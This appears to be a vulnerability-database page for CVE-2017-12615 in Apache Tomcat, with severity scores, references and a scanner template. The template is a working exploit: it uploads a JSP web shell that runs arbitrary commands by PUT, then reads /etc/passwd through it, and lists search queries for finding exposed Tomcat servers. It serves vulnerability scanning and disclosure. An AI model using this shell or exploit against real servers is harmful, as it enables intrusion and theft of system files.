CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
99.8%
Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
id: CVE-2017-12615
info:
name: Apache Tomcat Servers - Remote Code Execution
author: pikpikcu
severity: high
description: |
Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat.
reference:
- https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
- https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
- http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392
- https://nvd.nist.gov/vuln/detail/CVE-2017-12615
- http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-12615
cwe-id: CWE-434
epss-score: 0.96728
epss-percentile: 0.99659
cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: apache
product: tomcat
shodan-query:
- title:"Apache Tomcat"
- http.title:"apache tomcat"
- http.html:"apache tomcat"
- cpe:"cpe:2.3:a:apache:tomcat"
fofa-query:
- body="apache tomcat"
- title="apache tomcat"
google-query: intitle:"apache tomcat"
tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive
http:
- method: PUT
path:
- "{{BaseURL}}/poc.jsp/"
body: |
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100f76ba87ee6950ae8993f54b86cb9d672dad2cad52e4046e468435c556ca24187022100e066b49b38722e0d123561d3d9a2d70dfda587fa91320c78e7bded44327b4eb9:922c64590222798bb761d5b6d8e72950
breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html
web.archive.org/web/20211206035549/securitytracker.com/id/1039392
github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
nvd.nist.gov/vuln/detail/CVE-2017-12615
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
99.8%